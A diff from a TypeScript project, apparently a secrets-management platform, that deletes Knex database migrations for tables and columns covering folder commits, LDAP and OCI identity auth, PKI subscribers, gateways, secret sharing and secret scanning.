if (await knex.schema.hasTable(TableName.CertificateSecret)) {
await knex.schema.dropTable(TableName.CertificateSecret);
}
if (await knex.schema.hasColumn(TableName.CertificateBody, "encryptedCertificateChain")) {
await knex.schema.alterTable(TableName.CertificateBody, (t) => {
t.dropColumn("encryptedCertificateChain");
});
}
}

View File

@@ -1,47 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasEmail = await knex.schema.hasColumn(TableName.Users, "email");
const hasUsername = await knex.schema.hasColumn(TableName.Users, "username");
if (hasEmail) {
await knex(TableName.Users)
.where({ isGhost: false })
.update({
// @ts-expect-error email assume string this is expected
email: knex.raw("lower(email)")
});
}
if (hasUsername) {
await knex.schema.raw(`
CREATE INDEX IF NOT EXISTS ${TableName.Users}_lower_username_idx
ON ${TableName.Users} (LOWER(username))
`);
const duplicatesSubquery = knex(TableName.Users)
.select(knex.raw("lower(username) as lowercase_username"))
.groupBy("lowercase_username")
.having(knex.raw("count(*)"), ">", 1);
// Update usernames to lowercase where they won't create duplicates
await knex(TableName.Users)
.where({ isGhost: false })
.whereRaw("username <> lower(username)") // Only update if not already lowercase
// @ts-expect-error username assume string this is expected
.whereNotIn(knex.raw("lower(username)"), duplicatesSubquery)
.update({
// @ts-expect-error username assume string this is expected
username: knex.raw("lower(username)")
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasUsername = await knex.schema.hasColumn(TableName.Users, "username");
if (hasUsername) {
await knex.schema.raw(`
DROP INDEX IF EXISTS ${TableName.Users}_lower_username_idx
`);
}
}

View File

@@ -1,22 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SshHostLoginUserMapping, "groupId"))) {
await knex.schema.alterTable(TableName.SshHostLoginUserMapping, (t) => {
t.uuid("groupId").nullable();
t.foreign("groupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");
t.unique(["sshHostLoginUserId", "groupId"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SshHostLoginUserMapping, "groupId")) {
await knex.schema.alterTable(TableName.SshHostLoginUserMapping, (t) => {
t.dropUnique(["sshHostLoginUserId", "groupId"]);
t.dropColumn("groupId");
});
}
}

View File

@@ -1,166 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
if (!hasFolderCommitTable) {
await knex.schema.createTable(TableName.FolderCommit, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.bigIncrements("commitId");
t.jsonb("actorMetadata").notNullable();
t.string("actorType").notNullable();
t.string("message");
t.uuid("folderId").notNullable();
t.uuid("envId").notNullable();
t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderId");
t.index("envId");
});
}
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
if (!hasFolderCommitChangesTable) {
await knex.schema.createTable(TableName.FolderCommitChanges, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.string("changeType").notNullable();
t.boolean("isUpdate").notNullable().defaultTo(false);
t.uuid("secretVersionId");
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
t.uuid("folderVersionId");
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
t.index("secretVersionId");
t.index("folderVersionId");
});
}
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
if (!hasFolderCheckpointTable) {
await knex.schema.createTable(TableName.FolderCheckpoint, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
});
}
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
if (!hasFolderCheckpointResourcesTable) {
await knex.schema.createTable(TableName.FolderCheckpointResources, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCheckpointId").notNullable();
t.foreign("folderCheckpointId").references("id").inTable(TableName.FolderCheckpoint).onDelete("CASCADE");
t.uuid("secretVersionId");
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
t.uuid("folderVersionId");
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCheckpointId");
t.index("secretVersionId");
t.index("folderVersionId");
});
}
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
if (!hasFolderTreeCheckpointTable) {
await knex.schema.createTable(TableName.FolderTreeCheckpoint, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderCommitId");
});
}
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
if (!hasFolderTreeCheckpointResourcesTable) {
await knex.schema.createTable(TableName.FolderTreeCheckpointResources, (t) => {
t.uuid("id").primary().defaultTo(knex.fn.uuid());
t.uuid("folderTreeCheckpointId").notNullable();
t.foreign("folderTreeCheckpointId").references("id").inTable(TableName.FolderTreeCheckpoint).onDelete("CASCADE");
t.uuid("folderId").notNullable();
t.uuid("folderCommitId").notNullable();
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
t.timestamps(true, true, true);
t.index("folderTreeCheckpointId");
t.index("folderId");
t.index("folderCommitId");
});
}
if (!hasFolderCommitTable) {
await createOnUpdateTrigger(knex, TableName.FolderCommit);
}
if (!hasFolderCommitChangesTable) {
await createOnUpdateTrigger(knex, TableName.FolderCommitChanges);
}
if (!hasFolderCheckpointTable) {
await createOnUpdateTrigger(knex, TableName.FolderCheckpoint);
}
if (!hasFolderCheckpointResourcesTable) {
await createOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
}
if (!hasFolderTreeCheckpointTable) {
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
}
if (!hasFolderTreeCheckpointResourcesTable) {
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
}
}
export async function down(knex: Knex): Promise<void> {
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
if (hasFolderTreeCheckpointResourcesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpointResources);
}
if (hasFolderCheckpointResourcesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
await knex.schema.dropTableIfExists(TableName.FolderCheckpointResources);
}
if (hasFolderTreeCheckpointTable) {
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpoint);
}
if (hasFolderCheckpointTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCheckpoint);
await knex.schema.dropTableIfExists(TableName.FolderCheckpoint);
}
if (hasFolderCommitChangesTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCommitChanges);
await knex.schema.dropTableIfExists(TableName.FolderCommitChanges);
}
if (hasFolderCommitTable) {
await dropOnUpdateTrigger(knex, TableName.FolderCommit);
await knex.schema.dropTableIfExists(TableName.FolderCommit);
}
}

View File

@@ -1,22 +0,0 @@
import { Knex } from "knex";
import { ProjectType, TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.ProjectTemplates, "type"))) {
await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
// defaulting to sm for migration to set existing, new ones will always be specified on creation
t.string("type").defaultTo(ProjectType.SecretManager).notNullable();
t.jsonb("environments").nullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.ProjectTemplates, "type")) {
await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
t.dropColumn("type");
// not reverting nullable environments
});
}
}

View File

@@ -1,39 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityLdapAuth))) {
await knex.schema.createTable(TableName.IdentityLdapAuth, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
t.jsonb("accessTokenTrustedIps").notNullable();
t.uuid("identityId").notNullable().unique();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.binary("encryptedBindDN").notNullable();
t.binary("encryptedBindPass").notNullable();
t.binary("encryptedLdapCaCertificate").nullable();
t.string("url").notNullable();
t.string("searchBase").notNullable();
t.string("searchFilter").notNullable();
t.jsonb("allowedFields").nullable();
t.timestamps(true, true, true);
});
}
await createOnUpdateTrigger(knex, TableName.IdentityLdapAuth);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityLdapAuth);
await dropOnUpdateTrigger(knex, TableName.IdentityLdapAuth);
}

View File

@@ -1,46 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.PkiSubscriber))) {
await knex.schema.createTable(TableName.PkiSubscriber, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.timestamps(true, true, true);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("caId").nullable();
t.foreign("caId").references("id").inTable(TableName.CertificateAuthority).onDelete("SET NULL");
t.string("name").notNullable();
t.string("commonName").notNullable();
t.specificType("subjectAlternativeNames", "text[]").notNullable();
t.string("ttl").notNullable();
t.specificType("keyUsages", "text[]").notNullable();
t.specificType("extendedKeyUsages", "text[]").notNullable();
t.string("status").notNullable(); // active / disabled
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.PkiSubscriber);
}
const hasSubscriberCol = await knex.schema.hasColumn(TableName.Certificate, "pkiSubscriberId");
if (!hasSubscriberCol) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.uuid("pkiSubscriberId").nullable();
t.foreign("pkiSubscriberId").references("id").inTable(TableName.PkiSubscriber).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSubscriberCol = await knex.schema.hasColumn(TableName.Certificate, "pkiSubscriberId");
if (hasSubscriberCol) {
await knex.schema.alterTable(TableName.Certificate, (t) => {
t.dropColumn("pkiSubscriberId");
});
}
await knex.schema.dropTableIfExists(TableName.PkiSubscriber);
await dropOnUpdateTrigger(knex, TableName.PkiSubscriber);
}

View File

@@ -1,30 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityOciAuth))) {
await knex.schema.createTable(TableName.IdentityOciAuth, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
t.jsonb("accessTokenTrustedIps").notNullable();
t.timestamps(true, true, true);
t.uuid("identityId").notNullable().unique();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.string("type").notNullable();
t.string("tenancyOcid").notNullable();
t.string("allowedUsernames").nullable();
});
}
await createOnUpdateTrigger(knex, TableName.IdentityOciAuth);
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityOciAuth);
await dropOnUpdateTrigger(knex, TableName.IdentityOciAuth);
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasGatewayIdColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayId");
if (!hasGatewayIdColumn) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
table.uuid("gatewayId").nullable();
table.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("SET NULL");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasGatewayIdColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "gatewayId");
if (hasGatewayIdColumn) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
table.dropForeign("gatewayId");
table.dropColumn("gatewayId");
});
}
}

View File

@@ -1,112 +0,0 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
import { getMigrationEncryptionServices } from "./utils/services";
// Note(daniel): We aren't dropping tables or columns in this migrations so we can easily rollback if needed.
// In the future we need to drop the projectGatewayId on the dynamic secrets table, and drop the project_gateways table entirely.
const BATCH_SIZE = 500;
export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line no-param-reassign
knex.replicaNode = () => {
return knex;
};
if (!(await knex.schema.hasColumn(TableName.DynamicSecret, "gatewayId"))) {
await knex.schema.alterTable(TableName.DynamicSecret, (table) => {
table.uuid("gatewayId").nullable();
table.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("SET NULL");
table.index("gatewayId");
});
const existingDynamicSecretsWithProjectGatewayId = await knex(TableName.DynamicSecret)
.select(selectAllTableCols(TableName.DynamicSecret))
.whereNotNull(`${TableName.DynamicSecret}.projectGatewayId`)
.join(TableName.ProjectGateway, `${TableName.ProjectGateway}.id`, `${TableName.DynamicSecret}.projectGatewayId`)
.whereNotNull(`${TableName.ProjectGateway}.gatewayId`)
.select(
knex.ref("projectId").withSchema(TableName.ProjectGateway).as("projectId"),
knex.ref("gatewayId").withSchema(TableName.ProjectGateway).as("projectGatewayGatewayId")
);
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const updatedDynamicSecrets = await Promise.all(
existingDynamicSecretsWithProjectGatewayId.map(async (existingDynamicSecret) => {
if (!existingDynamicSecret.projectGatewayGatewayId) {
const result = {
...existingDynamicSecret,
gatewayId: null
};
const { projectId, projectGatewayGatewayId, ...rest } = result;
return rest;
}
const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({
type: KmsDataKey.SecretManager,
projectId: existingDynamicSecret.projectId
});
const { encryptor: secretManagerEncryptor } = await kmsService.createCipherPairWithDataKey({
type: KmsDataKey.SecretManager,
projectId: existingDynamicSecret.projectId
});
let decryptedStoredInput = JSON.parse(
secretManagerDecryptor({ cipherTextBlob: Buffer.from(existingDynamicSecret.encryptedInput) }).toString()
) as object;
// We're not removing the existing projectGatewayId from the input so we can easily rollback without having to re-encrypt the input
decryptedStoredInput = {
...decryptedStoredInput,
gatewayId: existingDynamicSecret.projectGatewayGatewayId
};
const encryptedInput = secretManagerEncryptor({
plainText: Buffer.from(JSON.stringify(decryptedStoredInput))
}).cipherTextBlob;
const result = {
...existingDynamicSecret,
encryptedInput,
gatewayId: existingDynamicSecret.projectGatewayGatewayId
};
const { projectId, projectGatewayGatewayId, ...rest } = result;
return rest;
})
);
for (let i = 0; i < updatedDynamicSecrets.length; i += BATCH_SIZE) {
// eslint-disable-next-line no-await-in-loop
await knex(TableName.DynamicSecret)
.insert(updatedDynamicSecrets.slice(i, i + BATCH_SIZE))
.onConflict("id")
.merge();
}
}
}
export async function down(knex: Knex): Promise<void> {
// no re-encryption needed as we keep the old projectGatewayId in the input
if (await knex.schema.hasColumn(TableName.DynamicSecret, "gatewayId")) {
await knex.schema.alterTable(TableName.DynamicSecret, (table) => {
table.dropForeign("gatewayId");
table.dropColumn("gatewayId");
});
}
}

View File

@@ -1,53 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const columns = await knex.table(TableName.Organization).columnInfo();
await knex.schema.alterTable(TableName.Organization, (t) => {
if (!columns.secretsProductEnabled) {
t.boolean("secretsProductEnabled").defaultTo(true);
}
if (!columns.pkiProductEnabled) {
t.boolean("pkiProductEnabled").defaultTo(true);
}
if (!columns.kmsProductEnabled) {
t.boolean("kmsProductEnabled").defaultTo(true);
}
if (!columns.sshProductEnabled) {
t.boolean("sshProductEnabled").defaultTo(true);
}
if (!columns.scannerProductEnabled) {
t.boolean("scannerProductEnabled").defaultTo(true);
}
if (!columns.shareSecretsProductEnabled) {
t.boolean("shareSecretsProductEnabled").defaultTo(true);
}
});
}
export async function down(knex: Knex): Promise<void> {
const columns = await knex.table(TableName.Organization).columnInfo();
await knex.schema.alterTable(TableName.Organization, (t) => {
if (columns.secretsProductEnabled) {
t.dropColumn("secretsProductEnabled");
}
if (columns.pkiProductEnabled) {
t.dropColumn("pkiProductEnabled");
}
if (columns.kmsProductEnabled) {
t.dropColumn("kmsProductEnabled");
}
if (columns.sshProductEnabled) {
t.dropColumn("sshProductEnabled");
}
if (columns.scannerProductEnabled) {
t.dropColumn("scannerProductEnabled");
}
if (columns.shareSecretsProductEnabled) {
t.dropColumn("shareSecretsProductEnabled");
}
});
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSecretSharingColumn = await knex.schema.hasColumn(TableName.Project, "secretSharing");
if (!hasSecretSharingColumn) {
await knex.schema.table(TableName.Project, (table) => {
table.boolean("secretSharing").notNullable().defaultTo(true);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSecretSharingColumn = await knex.schema.hasColumn(TableName.Project, "secretSharing");
if (hasSecretSharingColumn) {
await knex.schema.table(TableName.Project, (table) => {
table.dropColumn("secretSharing");
});
}
}

View File

@@ -1,35 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasLifetimeColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretLifetime");
const hasViewLimitColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretViewLimit");
if (!hasLifetimeColumn || !hasViewLimitColumn) {
await knex.schema.alterTable(TableName.Organization, (t) => {
if (!hasLifetimeColumn) {
t.integer("maxSharedSecretLifetime").nullable().defaultTo(2592000); // 30 days in seconds
}
if (!hasViewLimitColumn) {
t.integer("maxSharedSecretViewLimit").nullable();
}
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasLifetimeColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretLifetime");
const hasViewLimitColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretViewLimit");
if (hasLifetimeColumn || hasViewLimitColumn) {
await knex.schema.alterTable(TableName.Organization, (t) => {
if (hasLifetimeColumn) {
t.dropColumn("maxSharedSecretLifetime");
}
if (hasViewLimitColumn) {
t.dropColumn("maxSharedSecretViewLimit");
}
});
}
}

View File

@@ -1,43 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretSharing)) {
const hasEncryptedSalt = await knex.schema.hasColumn(TableName.SecretSharing, "encryptedSalt");
const hasAuthorizedEmails = await knex.schema.hasColumn(TableName.SecretSharing, "authorizedEmails");
if (!hasEncryptedSalt || !hasAuthorizedEmails) {
await knex.schema.alterTable(TableName.SecretSharing, (t) => {
// These two columns are only needed when secrets are shared with a specific list of emails
if (!hasEncryptedSalt) {
t.binary("encryptedSalt").nullable();
}
if (!hasAuthorizedEmails) {
t.json("authorizedEmails").nullable();
}
});
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretSharing)) {
const hasEncryptedSalt = await knex.schema.hasColumn(TableName.SecretSharing, "encryptedSalt");
const hasAuthorizedEmails = await knex.schema.hasColumn(TableName.SecretSharing, "authorizedEmails");
if (hasEncryptedSalt || hasAuthorizedEmails) {
await knex.schema.alterTable(TableName.SecretSharing, (t) => {
if (hasEncryptedSalt) {
t.dropColumn("encryptedSalt");
}
if (hasAuthorizedEmails) {
t.dropColumn("authorizedEmails");
}
});
}
}
}

View File

@@ -1,107 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
import {
SecretScanningFindingStatus,
SecretScanningScanStatus
} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SecretScanningDataSource))) {
await knex.schema.createTable(TableName.SecretScanningDataSource, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("externalId").index(); // if we need a unique way of identifying this data source from an external resource
t.string("name", 48).notNullable();
t.string("description");
t.string("type").notNullable();
t.jsonb("config").notNullable();
t.binary("encryptedCredentials"); // webhook credentials, etc.
t.uuid("connectionId");
t.boolean("isAutoScanEnabled").defaultTo(true);
t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.timestamps(true, true, true);
t.boolean("isDisconnected").notNullable().defaultTo(false);
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningResource))) {
await knex.schema.createTable(TableName.SecretScanningResource, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("externalId").notNullable();
t.string("name").notNullable();
t.string("type").notNullable();
t.uuid("dataSourceId").notNullable();
t.foreign("dataSourceId").references("id").inTable(TableName.SecretScanningDataSource).onDelete("CASCADE");
t.timestamps(true, true, true);
t.unique(["dataSourceId", "externalId"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningResource);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningScan))) {
await knex.schema.createTable(TableName.SecretScanningScan, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("status").notNullable().defaultTo(SecretScanningScanStatus.Queued);
t.string("statusMessage", 1024);
t.string("type").notNullable();
t.uuid("resourceId").notNullable();
t.foreign("resourceId").references("id").inTable(TableName.SecretScanningResource).onDelete("CASCADE");
t.timestamp("createdAt").defaultTo(knex.fn.now());
});
}
if (!(await knex.schema.hasTable(TableName.SecretScanningFinding))) {
await knex.schema.createTable(TableName.SecretScanningFinding, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("dataSourceName").notNullable();
t.string("dataSourceType").notNullable();
t.string("resourceName").notNullable();
t.string("resourceType").notNullable();
t.string("rule").notNullable();
t.string("severity").notNullable();
t.string("status").notNullable().defaultTo(SecretScanningFindingStatus.Unresolved);
t.string("remarks");
t.string("fingerprint").notNullable();
t.jsonb("details").notNullable();
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("scanId");
t.foreign("scanId").references("id").inTable(TableName.SecretScanningScan).onDelete("SET NULL");
t.timestamps(true, true, true);
t.unique(["projectId", "fingerprint"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningFinding);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningConfig))) {
await knex.schema.createTable(TableName.SecretScanningConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("projectId").notNullable().unique();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("content", 5000);
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningConfig);
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.SecretScanningFinding);
await dropOnUpdateTrigger(knex, TableName.SecretScanningFinding);
await knex.schema.dropTableIfExists(TableName.SecretScanningScan);
await knex.schema.dropTableIfExists(TableName.SecretScanningResource);
await dropOnUpdateTrigger(knex, TableName.SecretScanningResource);
await knex.schema.dropTableIfExists(TableName.SecretScanningDataSource);
await dropOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
await knex.schema.dropTableIfExists(TableName.SecretScanningConfig);
await dropOnUpdateTrigger(knex, TableName.SecretScanningConfig);
}

Some files were not shown because too many files have changed in this diff Show More